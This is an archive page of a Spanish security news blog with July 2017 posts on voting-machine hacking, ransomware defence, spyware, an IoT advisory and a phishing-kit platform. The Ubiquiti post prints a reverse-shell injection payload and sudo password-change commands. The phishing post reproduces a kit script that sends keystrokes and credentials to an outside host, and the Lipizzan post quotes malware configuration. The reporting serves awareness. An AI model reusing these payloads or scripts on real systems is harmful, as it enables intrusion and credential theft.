lunes, 31 de julio de 2017

Poniendo a prueba la seguridad de las máquinas de votación en la DefCon

El pasado fin de semana se celebró la famosa conferencia de seguridad DefCon en su 25ª edición. En esta ocasión,  el gobierno norteamericano cedió algunas máquinas de votación ya retiradas para que los investigadores disfrutaran y a la vez encontraran agujeros de seguridad para mejorar las nuevas remesas de máquinas.

Una de las máquinas cedidas fue la “ExpressPoll 5000”, que utilizaba un antiguo slot PCMCIA para transferir archivos, además de almacenar distintas bases de datos. Para empezar, hicieron un pequeño chequeo al sistema para sacar información general, como:


  • Sistema operativo Windows CE 5.0
  • El software estaba desarrollado en una aplicación usando .NET.
  • El software utilizaba WinForms en la interfaz de usuario.
  • El “bootloader” era propietario.
  • La arquitectura del procesador era ARM.
  • Contenía un fichero de base de datos en una tarjeta de memoria.


Tras probar múltiples exploits típicos para esta versión de Windows sin éxito, los investigadores se centraron en otro vector de ataque: la tarjeta de memoria.

Al arrancar el sistema con la tarjeta de memoria insertada, el bootloader comprueba un archivo llamado NK.BIN. Si está presente, lo carga en memoria RAM sin ningún tipo de comprobación de autenticidad. En ese momento se puede cambiar el firmware de manera permanente.

En este caso el archivo NK.BIN se utiliza para actualizaciones de Windows CE 5.0 en dicha máquina, pero un atacante puede subir y ejecutar cualquier Kernel NT e incluso una imagen con Linux (aunque esta última posibilidad no fue probada).



Inyección del nuevo bootloader


De manera similar a la que se cambia el firmware, también es posible cambiar el bootloader del sistema utilizando el fichero “EBOOT.BIN”. Se carga sin comprobar ninguna firma de integridad, al igual que el NK.BIN. Por desgracia esta vez la inyección no funcionó y el dispositivo quedó inservible.

Sobreescribiendo el archivo de recursos de la aplicación .NET


Cuando el software de ExpressPoll se lanza desde el botón “Lanzar” carga desde la tarjeta de memoria el archivo llamado “ExPoll.resources”. La idea de este archivo es poder definir imágenes, cadenas, botones, layouts, etc. Está pensado para personalizar la aplicación, por ejemplo sustituyendo el logotipo de Diebold.

El punto de fallo en el sistema es que los botones (y potencialmente otros elementos de la interfaz) se pueden sobreescribir para hacer otras acciones diferentes, como ejecutar un archivo almacenado en la tarjeta de memoria o ejecutar un comando en Windows CE.

La vulnerabilidad ha sido confirmada creando un archivo de recursos aleatorio de .NET, nombrándolo ExPoll.resources y copiándolo a la tarjeta de memoria. Como era de esperar, el sistema mostró un error, lo que significa que la carga del archivo funcionó. Pero al cargar un archivo corrupto se copió a memoria y dejando el sistema inservible en el proceso.

Bases de datos SQLite3


Pero sin duda una de las vulnerabilidades que más llamaron la atención es la del archivo de base de datos llamado “PollData.db3” en la tarjeta de memoria. Esta base de datos contenía toda la información de las encuestas, votantes… Usando esta información nos encontramos con varios tipos de posible ataques:


  • Filtración de información: Un atacante puede fácilmente extraer la tarjeta de memoria y reemplazarla por una que esté vacía.
  • Falsificación de información: Un atacante podría crear su propia base de datos y, reemplazando la tarjeta, cambiar los votos por unos falsos.


Datos de la base de datos. Fuente: blog.horner.tj

Puertos USB abiertos

El dispositivo dispone de una serie de puertos USB donde un atacante puede introducir un dispositivo para lanzar un ataque. A partir de aquí, las posibilidades quedan abiertas a la imaginación del lector.

Servidor web por defecto en WinCE

Windows CE tiene por defecto un servidor web abierto en el puerto 80 que se podría considerar como un riesgo de seguridad. Por ahora no han conseguido ningún ataque usando este vector, pero la investigación sigue abierta.

Los investigadores probaron otra serie de ataques, como desbordamientos de memoria usando “Bash Bunny” a través de los puertos USB, o introduciendo una base de datos de SQLite mayor de 1GB, sin que llegara a funcionar.


Más información:
Hacking Voting Machines at DEF CON 25
https://blog.horner.tj/post/hacking-voting-machines-def-con-25

Antonio Sánchez

domingo, 30 de julio de 2017

ShieldFS: un sistema de ficheros contra el ransomware

ShieldFS es un sistema de ficheros que nace fruto de la investigación de un equipo del Politécnico de Milán. Durante meses, recolectaron datos de millones de peticiones de I/O realizadas por aplicaciones legítimas en sistemas operativos limpios, y por ransomware en equipos infectados. Esto permitió ver las diferencias entre ambos y establecer modelos de comportamiento.


En general, al comparar con otros procesos, en el comportamiento típico del ransomware se realizan más lecturas, escrituras y cambios de nombre a un fichero, además de generar alta entropía en las operaciones de escritura. Hay un análisis pormenorizado de esta comparativa en la tabla 3 de su estudio.

Con estos datos en la mano, es posible reconocer el ransomware nada más comience su actividad maliciosa. Para esto, se diseñó una capa de protección y sistema de monitorización de procesos que se introdujo cono driver en el sistema de ficheros nativo de Windows. Al iniciarse un proceso desconocido, es monitorizado en sus primeros pasos en el sistema hasta que se puede discernir por su comportamiento que es seguro. En caso de detectar actividad propia del ransomware, el proceso queda bloqueado.
Comparación de actividad entre procesos benignos y ransomware. Tomado de http://shieldfs.necst.it/shieldfs-acsac16.pdf

Pero la funcionalidad del sistema de ficheros va más allá de este bloqueo. Además, se
incluye un sistema de respaldo que mantiene copias recientes de los ficheros. De esta manera, tras la detección del ransomware, todos los ficheros escritos por este se sustituyen por un respaldo reciente en cuestión de segundos.

Esto es especialmente útil dado que, según los investigadores, en ocasiones los rescates se pagan simplemente porque los ficheros recientes son más valiosos para los usuarios. Los sistemas de respaldo tradicionales deben llegar a un compromiso entre rendimiento, espacio y actualidad, y es complicado que tengan cambios recientes. Esta dificultad es eludida por ShieldFS al trabajar a más bajo nivel.
Funcionamiento de ShieldFS. Tomado de http://shieldfs.necst.it/shieldfs-acsac16.pdf

Para las pruebas del sistema, se llevaron a cabo infecciones de tres muestras de ransomware (TeslaCrypt, Critroni y ZeroLocker) en equipos reales de usuarios voluntarios detectando y restaurando la actividad maliciosa con éxito.

Sin embargo, el sistema tiene limitaciones. Por ejemplo, un atacante podría camuflar la actividad maliciosa inyectando código en los procesos benignos del sistema y dejando que cada uno de estos haga una pequeña parte del cifrado malicioso, camuflado así su actividad.

ShieldFS fue presentado el pasado diciembre en la Annual Computer Security Applications Conference de Los Angeles y el pasado miércoles en la Black Hat en Las Vegas. Aunque de momento pertenece al mundo académico, estaremos atentos al avance del proyecto para ver si representa un avance hacia la erradicación del ransomware, una amenaza que ha atacado con especial virulencia en los últimos meses.


Más información:
SHIELDFS: A Self-healing, Ransomware-aware Filesystem


ShieldFS: A Self-healing, Ransomware-aware Filesystem Paper [PDF]:


Francisco López

sábado, 29 de julio de 2017

Múltiples vulnerabilidades críticas en Ubiquiti Networks UniFi Cloud Key

Se han revelado varias vulnerabilidades críticas en los dispositivos Ubiquiti Networks UniFi Cloud Key que podrían permitir la inyección de comandos, la obtención de la contraseña del usuario y elevar privilegios.



La primera de las vulnerabilidades se encuentra en el fichero ‘api.incy podría permitir una inyección de comandos a través del envío a la víctima de un enlace de actualización para el firmware de UniFi Cloud Key especialmente manipulado. Así sería posible utilizar una shell inversa para obtener acceso al dispositivo.

;busybox nc <IP-Origen> <Puerto-Origen> -e /bin/bash;
http://enlace-utilizado-para-ocultar-el-comando-en-la-ventana-de-actualizacion


En este punto se podría obtener la contraseña del usuario debido a un segundo fallo de seguridad: el fichero ‘system.cfgalmacena los nombres de usuario y hashes MD5 de las contraseñas, los cuales se podrían romper en un tiempo razonable. Y, aunque el usuario de la interfaz web ‘www-data’ tiene permisos limitados de acceso y ejecución, sí puede leer dicho archivo de configuración.

Una vez obtenida la contraseña del usuario, sería posible modificar la configuración de la red inalámbrica.

Además existe una tercera vulnerabilidad que podría permitir secuestrar al usuario ‘root’ y elevar privilegios en el dispositivo. El fallo, ubicado en el fichero ‘/etc/sudoers.d/cloudkey-webui’, consiste en que algunos binarios permiten la ejecución a través de "sudo" sin solicitar la contraseña de ‘root’. De tal forma que la contraseña del usuario "rootpuede ser modificada por el usuario ‘www-data’ a pesar de tener permisos limitados a mediante el binario ‘ubnt-systool’. Ejemplo:

$ cd /tmp
$ echo "root:password" > file.txt
$ /usr/bin/sudo /sbin/ubnt-systool chpasswd < file.txt




Aunque estos errores fueron descubiertos el pasado mes de Febrero por SEC Consult, la información no ha sido revelada hasta el momento para permitir una ventana temporal suficiente tanto para que el fabricante liberase una solución como para que los usuarios pudiesen actualizar sus dispositivos.

Se ha comprobado que las versiones 0.5.9 y 0.6.0, y potencialmente versiones anteriores, de Ubiquiti Networks UniFi Cloud Key son vulnerables. Para solucionar estos problemas es necesario instalar la actualización del firmware v0.6.1 o superior.


Más información:
Ubiquiti Networks UniFi Cloud Key multiple critical vulnerabilities
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20170727-0_Ubiquiti_Networks_UniFi_Cloud_Key_Multiple_Critical_Vulnerabilities_v10.txt

UniFi Cloud Key firmware download
https://www.ubnt.com/download/unifi

Juan José Ruíz

viernes, 28 de julio de 2017

Lipizzan: el nuevo Malware espía detectado en Google Play

Hace unos días, Google anunciaba el descubrimiento de un nuevo malware para Android. Se trata de una aplicación maliciosa cuya misión es recopilar todo tipo de información personal sobre la víctima para después transmitirla al atacante.


El malware implementa rutinas para capturar datos de las principales aplicaciones de mensajería: WhatsApp, Telegram, Messenger, Skype, GMail, etc.

Además, permite controlar de forma remota la cámara, el micrófono y acceder a los archivos del dispositivo y a su localización.

Aunque no se conoce con seguridad su procedencia, los investigadores de Android Security han encontrado en su código referencias a Equus Technologies, una empresa israelí especializada en el desarrollo de herramientas de vigilancia. De hecho, para la investigación sobre Lipizzan se han utilizado las mismas técnicas que en el estudio de otras infecciones recientes como Chrysaor, desarrollada por NSO Group.

Logo de NSO Group


Cómo infecta Lipizzan

El virus se camufla como una aplicación legítima para realizar backups o para limpiar el sistema, poniendose a disposición del público en distintos markets y repositorios (incluído Google Play). La infección tiene lugar en dos etapas:
  1. Una primera etapa, en la que la víctima descarga e instala la aplicación.
  2. Una segunda, etapa en la que tras comprobar que el dispositivo es vulnerable, descarga las instrucciones necesarias para rootear el dispositivo y controlarlo.

Muestra de la segunda componente:

Media Server [Koodous]

Las últimas variantes del virus cambian el nombre de paquete, y ahora transmiten el exploit de la segunda fase de forma cifrada, lo que dificulta la detección. Además dispone de mecanismos de detección de máquinas virtuales para ocultar su verdadero comportamiento ante los ojos del analista inexperto.

A continuación uno de los ficheros de configuración que recopila alguna información interesante sobre el malware:


Extensiones de los archivos objetivo

"extensions": ["3dm", "3ds", "3fr", "3g2", "3gp", "3gpp", "3pr", "7z",
"ab4", "accdb", "accde", "accdr", "accdt", "ach", "acr", "act", "adb",
"ads", "agdl", "ai", "ait", "al", "apj", "arw", "asf", "asm", "asp", "asx",
"avi", "awg", "back", "backup", "backupdb", "bak", "bank", "bay", "bdb",
"bgt", "bik", "bkp", "blend", "bpw", "c", "cdf", "cdr", "cdr3", "cdr4",
"cdr5", "cdr6", "cdrw", "cdx", "ce1", "ce2", "cer", "cfp", "cgm", "cib",
"class", "cls", "cmt", "cpi", "cpp", "cr2", "craw", "crt", "crw", "crypt5",
"crypt6", "crypt7", "crypt8", "cs", "csh", "csl", "csv", "dac", "db", "db-journal",
"db3", "dbf", "dc2", "dcr", "dcs", "ddd", "ddoc", "ddrw", "dds", "der", "des",
"design", "dgc", "djvu", "dng", "doc", "docm", "docx", "dot", "dotm", "dotx", "drf", "drw", "dtd", "dwg", "dxb", "dxf", "dxg", "eml", "eps", "erbsql", "erf", "exf", "fdb", "ffd", "fff", "fh", "fhd", "fla", "flac", "flv", "fpx", "fxg", "gray", "grey", "gry", "h", "hbk", "hpp", "ibank", "ibd", "ibz", "idx", "iif", "iiq", "incpas", "indd", "java", "jpe", "kc2", "kdbx", "kdc", "key", "kpdx", "lua", "m", "m4v", "max", "mdb", "mdc", "mdf", "mef", "mfw", "mmw", "moneywell", "mos", "mov", "mp3", "mp4", "mpg", "mrw", "mrw", "msg", "myd", "nd", "ndd", "nef", "nk2", "nop", "nrw", "ns2", "ns3", "ns4", "nsd", "nsf", "nsg", "nsh", "nwb", "nx2", "nx1", "nyf", "oab", "obj", "odb", "odc", "odf", "odg", "odm", "odp", "ods", "odt", "oil", "orf", "ost", "otg", "oth", "otp", "ots", "ott", "p12", "p7b", "p7c", "pab", "pages", "pas", "pat", "pcd", "pct", "pdb", "pdd", "pdf", "pef", "pem", "pfx", "php", "pl", "plc", "pot", "potm", "potx", "ppam", "pps", "ppsm", "ppsx", "ppt", "pptm", "pptx", "prf", "ps", "psafe3", "psd", "pspimage", "pst", "ptx", "py", "qba", "qbb", "qbm", "qbr", "qbw", "qbx", "qby", "r3d", "raf", "rar", "rat", "raw", "rdb", "rm", "rtf", "rw2", "rw1", "rwz", "s3db", "sas7bdat", "say", "sd0", "sda", "sdf", "sldm", "sldx", "sql", "sqlite", "sqlite3", "sqlitedb", "sr2", "srf", "srt", "srw", "st4", "st5", "st6", "st7", "st8", "stc", "std", "sti", "stw", "stx", "svg", "swf", "sxc", "sxd", "sxg", "sxi", "sxm", "sxw", "tex", "tga", "thm", "tlg", "txt", "vob", "wallet", "wav", "wb2", "wmv", "wpd", "wps", "x11", "x3f", "xis", "xla", "xlam", "xlk", "xlm", "xlr", "xls", "xlsb", "xlsm", "xlsx", "xlt", "xltm", "xltx", "xlw", "ycbcra", "yuv", "zip"],

Lista negra de aplicaciones

"blacklist_apps": ["org.antivirus", "com.antivirus", "com.avast.android.mobilesecurity", "com.cleanmaster.security", "com.avira.android", "com.trustgo.mobile.security", "com.kms.free", "com.kaspersky.kes", "com.kaspersky.lightscanner", "com.cleanmaster.mguard", "com.lookout.enterprise", "com.wsandroid.suite", "com.eset.ems2.gp", "com.symantec.enterprise.mobile.security", "com.qihoo.security",
"org.malwarebytes.antimalware", "com.trendmicro.tmmssuite.mdm", "com.trendmicro.virdroid", "com.bitdefender.antivirus", "com.zimperium.zips", "com.psafe.msuite", "com.sophos.smsec", "com.drweb", "com.drweb.mcc", "com.bullguard.mobile.mobilesecurity", "com.bullguard.mobilebackup", "net.nshc.droidx3", "net.nshc.droidx3web", "com.sophos.appprotectionmonitor", "com.sophos.smsec", "com.sophos.mobilecontrol.client.android", "com.sophos.smenc", "com.comodo.cisme.antivirus", "com.quickheal.platform", "com.mobandme.security.virusguard", "de.gdata.mobilesecurity", "de.gdata.securechat", "com.webroot.security.sme", "com.webroot.secureweb", "com.ahnlab.v3mobileplus", "com.antiy.avlpro", "com.antiy.avl"],


Servidor de contacto

"api_url": "https://vps.equus-tech.com:44001",

Algunas muestras de Lipizzan

Primeras versiones de Lipizzan
Versiones actualizadas de Lipizzan
Las aplicaciones ya se encuentran fuera de Google Play y los pocos usuarios infectados (unos 100) ya han sido debidamente notificados.

Como siempre y como recomendación: sentido común y desconfiar de aplicaciones poco conocidas.

Más información:

Información oficial de los desarrolladores de Google

Repositorio con muestras de Lipizzan

jueves, 27 de julio de 2017

De los creadores de SambaCry llega CowerSnail


El mismo grupo de atacantes – sin nombre conocido aún – que crearon SambaCry han creado este nuevo malware, el cual tiene como objetivo a sistemas Windows.

SambaCry fue detectado a principios de junio como un ataque que utilizaba la vulnerabilidad CVE-2017-7494 de Samba (de la que adquiere el nombre) para distribuirse. El objetivo de este malware es aprovechar los recursos del equipo infectado para minar criptomonedas, tales como Bitcoin, Latecoin, Monero, etc., instalando para ello el software CPUminer en el equipo víctima.
CowerSnail, es un backdoor que permite a los atacantes ejecutar cualquier comando en los sistemas infectados. Curiosamente, ambos troyanos usan el mismo C&C: cl.ezreal.space:20480. Lo que apunta a que ambos provienen de los mismo creadores según los investigadores de Kapersky Labs, que descubrieron ambas amenazas.


Sin embargo, hay pocas similitudes más allá de esta. Mientras que SambaCry atacaba a sistemas *nix, CowerSnail está enfocado a sistemas Windows. Además, algunos investigadores aseguran que este nuevo troyano cuenta con otras características especiales, como la recolección de información del equipo que infecta, y que van más allá de instalar software de minado.

Sergey Yunakovsky, de Kapersky Labs, afirma que: 

Después de crear dos troyanos separados, cada uno para una plataforma específica, es muy probable que este grupo continúe produciendo malware en el futuro.

Más información:

CowerSnail, from the creators of SambaCry:

miércoles, 26 de julio de 2017

Publicado el código fuente para Android de SLocker, el ransomware de las mil caras


SLocker es un ransomware para Android que cifra los archivos y bloquea la pantalla. Se caracteriza por haberse hecho pasar por distintas fuerzas de seguridad de los estados, e incluso por el mismísimo WannaCry, para cobrar el rescate.

Una versión de SLocker la que se disfraza de WannaCry


Como si de una herramienta open source cualquiera se tratase, hace unos días se publicó en GitHub el código fuente de SLocker. El responsable, un usuario bajo el pseudónimo fs0c1ety, Tal y como avisa en la descripción, no es el código fuente original, sino el obtenido tras decompilar una muestra con técnicas de ingeniería inversa. Parece ser que este usuario le está cogiendo el gustillo a eso de decompilar malware para Android y publicar el código fuente, como muestra otro nuevo repositorio en su misma cuenta, esta vez decompilando GhostCtrl, otro peligroso malware para Android que, según la versión, recopila datos personales del terminal, secuestra funcionalidades del teléfono, o todo a la vez.

En vez de centrarnos en el ransomware en sí, sobre el que ya hay información en la red de sobra, vamos a centrarnos en la publicación de su código fuente. El que publica especifica que el código fuente debe ser usado únicamente con propósitos de investigación en seguridad informática. Pero las palabras son sólo palabras, y el patrón es conocido de sobra: se publica el código fuente de un malware y en los días sucesivos florece una gran variedad de versiones de este, compiladas usando como base el código fuente publicado. La verdad, no podemos saber a ciencia cierta la intención de este usuario de GitHub que pide ayuda en una issue (ticket) para compilar el malware.




El código fuente público de malware atrae principalmente a delincuentes con perfil bajo, y no se espera un gran impacto a pesar de la liberación. Los delincuentes más experimentados suelen preferir programar ellos mismos el malware o comprarlo hecho a terceros con soporte y garantía de no ser demasiado público (y por tanto demasiado investigado y detectado). Al no ser atacantes muy sofisticados, los medios de propagación del malware tampoco lo serán, y seguramente se limitarán a intentar colar troyanos usando ingeniería social (haciendo pasar el malware por una herramienta para rootear el móvil o hacer trampas en un videojuego).

¿Cómo evitar ser infectado? El principal punto débil sigue siendo el usuario. Una vez tienes todo software del terminal actualizado, el resto es sentido común. No instales aplicaciones sospechosas (ni siquiera si vienen de Google Play), ya sabes que el malware se disfraza. ¿De verdad necesitas esa aplicación para hacer trampas en un videojuego? Te puede costar un mal rato...


Más información:

SLocker decompiled code leaked online for free, a gift for crooks and hackers
http://securityaffairs.co/wordpress/61323/malware/slocker-source-code.html

Cómo saber si estamos infectados por el troyano GhostCtrl y cómo protegernos de él
https://www.softzone.es/2017/07/17/ghostctrl-nuevo-troyano-android/

Ransomware Recap: Ransomware as a Service Surge, SLocker Resurfaces
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-ransomware-as-a-service-surge-slocker-resurfaces

Carlos Ledesma

martes, 25 de julio de 2017

Apple parchea Broadpwn entre otras vulnerabilidades en sus últimos boletines

Apple ha publicado 7 boletines de seguridad que solucionan vulnerabilidades en otros tantos de sus productos: iOS, macOS, watchOS, tvOS, Safari, iTunes e iCloud para Windows. En total se corrigen 208 fallos de seguridad entre ellos el célebre “BroadPwn”.

BroadPwn” es el nombre con el que se ha bautizado una vulnerabilidad crítica en chipsets Wi-Fi de Broadcom que podría comprometer remotamente y sin interacción del usuario a los dispositivos afectados. Concretamente, el fallo de seguridad se encuentra en chips de la familia BCM43xx, los cuales son ampliamente utilizados en la industria. Así nos encontramos con que millones de dispositivos Android de diversos fabricantes (HTC, LG, Nexus y Samsung entre otras) y de Apple (en este caso iOS, macOS, watchOS y tvOS) se encuentran afectados.

Por su parte, Google solventó esta vulnerabilidad, con identificador CVE-2017-9417, en su boletín mensual del 5 de julio, mientras que Apple ha presentado la solución en sus boletines del 19 de este mes.

La vulnerabilidad “BroadPwn” ha sido descubierta por Nitay Artenstein de Exodus Intelligence, quien la presentará en los próximos días en la Black Hat USA 2017, donde explicará cómo encontró el error y mostrará una prueba de cómo aprovecharlo para lograr la ejecución de código.

Volviendo a los boletines de Apple, dada la gran cantidad de productos actualizados, vamos a realizar un breve repaso de las actualizaciones publicadas y problemas solucionados:

El sistema operativo para dispositivos móviles de Apple (iPad, iPhone, iPod…), iOS 10.3.3, resuelve 47 vulnerabilidades. Los problemas corregidos están relacionados con múltiples componentes, entre los que se incluyen CoreAudio, Contacts, Messages, Notifications, Telephony, el kernel y WebKit, entre otros. 33 de las vulnerabilidades podrían permitir la ejecución de código.

También se ha publicado la versión 10.12.6 de OS X Sierra y el Security Update 2017-003 para El Capitan y Yosemite. En este caso se solucionan 37 nuevas vulnerabilidades que afectan a múltiples y muy diversos componentes, que entre otros incluyen a Audio, Wi-Fi, Bluetooth, controladores gráficos, y el kernel. La ejecución de código podría ser el impacto potencial provocado por 25 de estos errores de seguridad.

Las actualizaciones también incluye a Safari, el navegador web de Apple, que se actualiza a la versión Safari 10.1.2 para OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, y macOS Sierra 10.12.6. Se solucionan 25 vulnerabilidades debidas a problemas en WebKit, el motor de navegador de código abierto que es la base de Safari. 19 de estas vulnerabilidades son de alta gravedad y podrían permitir la ejecución de código.

De forma similar, Apple publica watchOS 3.2.2, destinada a su reloj inteligente o “smartwatch” Apple Watch. con la que se solucionan hasta 16 vulnerabilidades, la mayoría de ellas (12) podrían permitir la ejecución remota de código arbitrario.

Apple también ha publicado tvOS 10.2.2, para sus televisores, que corrige 38 vulnerabilidades en múltiples componentes, de las cuales 31 son graves.

También se ha publicado iTunes 12.6.2 para Windows 7 y posteriores, una versión menor que incluye la corrección de 23 vulnerabilidades.

Por último, Apple ha publicado la actualización 6.2.2 de iCould para Windows 7 y posteriores 22 problemas de seguridad.


Más información:
iOS 10.3.3
https://support.apple.com/es-es/HT207923

macOS Sierra 10.12.6, Actualización de seguridad 2017-003 El Capitan y
Actualización de seguridad 2017-003 Yosemite
https://support.apple.com/es-es/HT207922

Safari 10.1.2
https://support.apple.com/es-es/HT207921

watchOS 3.2.3
https://support.apple.com/es-es/HT207925

tvOS 10.2.2
https://support.apple.com/es-es/HT207924

iTunes 12.6.2 para Windows
https://support.apple.com/es-es/HT207928

iCloud para Windows 6.2.2
https://support.apple.com/es-es/HT204283


Juan Jose Ruiz

lunes, 24 de julio de 2017

Millones de datos de personal militar, testigos protegidos y material militar filtrados por el gobierno sueco.

El gobierno sueco ha expuesto datos sensibles de millones de ciudadanos. Sin embargo, las consecuencias no han ido más lejos de, al cambio, 8,500$

¿Cómo comenzó todo? 

En 2015, la Agencia de Transportes sueca (STA, de ahora en adelante) llegó a un acuerdo de mantenimiento de equipos informáticos para gestionar sus bases de datos y redes con IBM Suecia.

La STA subió su base de datos completa a servidores en la nube de IBM, la cual contenía detalles sobre todos los vehículos del país incluyendo aquellos correspondientes a la policía, registros militares e incluso testigos protegidos.



Y fue esa misma base de datos es la que la agencia de transportes envió a vendedores suscritos, y además en texto plano, sin cifrar. Al descubrirse el error, la agencia de transportes simplemente envió un nuevo e-mail, pidiendo a las personas suscritas que eliminarán la base de datos completa que ellos mismos habían mandado anteriormente.

Pero el escándalo no acaba aquí. La subcontratación llevada a cabo con IBM permitía el acceso desde fuera de Suecia a los sistemas de la STA sin pasar por medidas de seguridad necesarias. Los administradores de IBM en la República Checa tenían acceso a todos los datos y registros, mientras que otra empresa en Serbia administraba las comunicaciones.

Según Rick Falkvinge, fundador de la VPN Private Internet Access, quien hizo público el escándalo, los datos incluidos en esta filtración incluyen:
  • Capacidad de todas las carreteras y puentes.
  • Nombres, fotos y direcciones de pilotos de combate de las fuerzas aéreas..
  • Nombres, fotos y direcciones de todos los incluidos en el registro policial, los cuales se creían datos clasificados.
  • Nombres, fotos y direcciones de todos los operadores de las unidades de élite del país, el equivalente a los Navy SEAL. 
  • Nombres, fotos, y direcciones de todos los testigos protegidos.
  • Tipo, módelo, tamaño, e incluso defectos en todos los vehículos militares, incluyendo sus operadores.
A pesar de que la brecha se produjo en 2015, no fue descubierta hasta 2016 y acabó con la renuncia de Maria Agren, directora general de la STA, en enero de 2017, además de una multa de 8,500$.

Lo más preocupante: La base de datos no será segura hasta este otoño, según palabras del nuevo director general Jonas Bjelfvenstam.

Más información:
https://www.bleepingcomputer.com/news/security/biggest-data-leak-in-swedens-history-punished-with-half-a-months-paycheck/

Fernando Díaz
fdiaz@hispasec.com

domingo, 23 de julio de 2017

La facilidad de los atacantes a día de hoy: Ataques de phishing a golpe de click

No es novedad que a diario se venden miles de herramientas de hacking usadas con fines maliciosos. Estas herramientas, por regla general, requieren de un mínimo de conocimiento por parte del ciberdelincuente, pero a día de hoy esto está cambiando, y es que ya existen plataformas para realizar múltiples tipos de ataques sin saber siquiera el nombre del mismo.

Hoy vamos a exponer un caso de uso de unas de las múltiples plataformas que se pueden encontrar por Internet. El nombre de la web no va a ser publicado para no fomentar el uso de la misma entre los lectores.

Llama la atención al entrar en la web, la interfaz amigable y por qué no decirlo, infantil que tiene. Parece una página sin ninguna malicia, sin embargo contiene numerosos tipos de ataques los cuáles están gravemente penados por la ley en nuestro país.

Al registrarte, lo primero que aparece es un mensaje de bienvenida el cuál nos indica que tienen un pequeño tutorial para nosotros.

Bienvenida a la plataforma

Al avanzar, nos encontramos un “about” de la web. Nos explica que la página nos da acceso a una serie de “complejas herramientas” y que en pocos pasos vamos a aprender a usar una de ellas de manera gratuita.

Realmente las herramientas a las que te dan acceso son muy simples y apenas requieren de conocimientos para hacer el ataque de forma manual.

Por supuesto, no era de dudar que cuenta con una versión PREMIUM para sacar más provecho a la herramienta.

Avanzamos a través de los paneles y podemos comprobar cómo el primer ataque que nos enseña es la realización de un phishing a Facebook.

Cómo hackear una cuenta de Facebook!

Aunque nuestros lectores están habituados a escuchar la palabra phishing, vamos a recordar que es un  ataque de phishing aquel que mediante ingeniería social, se centra en adquirir cierta información confidencial de la víctima. Para ello, el cibercriminal se hace pasar por una persona o entidad (en este caso por la red social Facebook) para solicitarle esa información.

Un par de clicks y nos genera un enlace con una burda versión de la página de Facebook para que se la enviaemos a nuestra víctima.

Al ver la web cualquier persona con unos conocimientos mínimos no caería ni por el enlace, el cuál es muy llamativo, ni por la imagen que da, la cuál es bastante pobre. Pero, sin embargo, alguien sin conocimientos sí que podría pensar que es una página legítima.

Enlaces generados para el ataque de phishing
Página de Facebook generada para el ataque

Pero algo todavía mucho más llamativo, es que al escribir la contraseña ni siquiera oculte los caracteres como haría un campo de tipo contraseña.


Detalles de la contraseña en texto claro

Si comprobamos el código fuente de la web generada para el ataque, vemos que apenas son 127 líneas. Dentro de ellas, podemos encontrar un hotlinking a los iconos de Facebook en una página externa a Facebook:

http://www.questionpro.com/qp_userimages/sub-2/1419981/Facebook.png?userFileID=259491
http://www.portugalrx.com/wp-content/uploads/2016/02/facebook_logo.png

También podemos ver el script que nos redirecciona a Facebook una vez “iniciamos sesión en la página”:

 <script type="text/javascript">  
   var BigData = {  
     id: '3015',  
     token: 'i0n8QDoNAk8VHo8Pg3MKNcwtXE0LWT2zUAYBdL9qAOlTkZpB6s',  
     name: 'Facebook',  
     site_id: '9',  
     redirect: 'http://www.facebook.com/login',  
     hsData: "9|3015|i0n8QDoNAk8VHo8Pg3MKNcwtXE0LWT2zUAYBdL9qAOlTkZpB6s|1500371221",  
   };  
   var socket = io('https://pod-1.logshit.com');  
   socket.on('ping', function (data) {  
     socket.emit('hello', BigData );  
   });  
   socket.on('redirect', function(data){  
     window.location = BigData.redirect;  
   });  
   $(document).ready(function(){  
     $('body').click(function(e){  
       this.BigData = BigData;  
       socket.emit('clicked', this.BigData);  
     });  
     $('body').on('keyup', function(e){  
       this.BigData = BigData;  
       this.BigData.key = e.key;  
       socket.emit('keyup', this.BigData);  
     });  
   });  
   $("#login_form").keypress(function(e) {  
     if (e.which == 13) {  
       $("#submit").click();  
     }  
   });  
   $("#submit").click(function(e) {  
     e.preventDefault();  
     if ($("#username").val() == "") {  
       var err = "1";  
       alert('Username cannot be left empty');  
     }  
     if ($("#password").val() == "") {  
       var err = "1";  
       alert('Password cannot be left empty');  
     }  
     if (err != "1") {  
       socket.emit('log', {  
         username : $("#username").val(),  
         password : $("#password").val(),  
         hsData: BigData.hsData,  
         BigData: BigData,  
       });  
     }  
   });  
 </script>  

Es un ataque de phishing muy básico pero que cualquier persona podría realizar sin ningún tipo de complicación ni conocimientos.

Al terminar de preparar el ataque, te recomiendan otras dos guías. La primera de ellas es para realizar un phishing a un correo electrónico y la segunda para ver los logs de las personas que han picado en el ataque.

Guías que ofrece el servicio

Si nos dirigimos al apartado de nuestra web creada, veremos cómo aparecen las estadísticas de las visitas recibidas:

Estadísticas de las visitas recibidas

Indagando un poco más en la página, podemos ver cómo ofrecen este servicio para realizar este tipo de ataque a 26 webs diferentes.

Servicios contra los que se puede crear un phishing a golpe de click

También cuentan con un market en el que puedes comprar o vender servicios. Los métodos de pago aceptados son muy variados, desde Bitcoin hasta Paypal pasando por Western Union y MoneyGram.

Servicios de pago aceptados

Si además pagamos por la cuenta PREMIUM antes mencionada, cabe destacar que tenemos acceso a más servicios, los cuáles parecen ser igual de mediocres que el anterior pero que con una víctima inexperta y un poco de ingeniería social, podrían ser realmente dañinos.

Servicios premium ofrecidos por la plataforma

Con esta una-al-día queríamos demostrar a nuestros lectores que hoy en día realizar acciones maliciosas en Internet no es complicado ni requiere de conocimientos Informáticos, pero en España puede llegar a incurrir en penas de 6 meses a 3 años de prisión. 

Para finalizar, recalcar que esta es una de las muchas plataformas de creación de phishing gratuitas que hay por Internet. Algunas más simples, otras más complejas, pero todas pueden ser usadas para realizar acciones maliciosas altamente penadas.


Daniel Púa

sábado, 22 de julio de 2017

Ejecución remota de código en el SDK Source de Valve

El investigador privado Justin Taft (@JustTaft), perteneciente a la firma One Up Security, ha demostrado recientemente que el motor de juegos Source de la empresa Valve se veía afectado por una ejecución remota de código que ha sido finalmente solucionada.

Source es el motor oficial de videojuegos utilizado por Valve para sus diferentes títulos, como Counter Strike:GO, Teamfortress 2, Half-Life 2: Deathmatch, etc... y también usado por terceros de manera gratuita, para el desarrollo de mods propios.

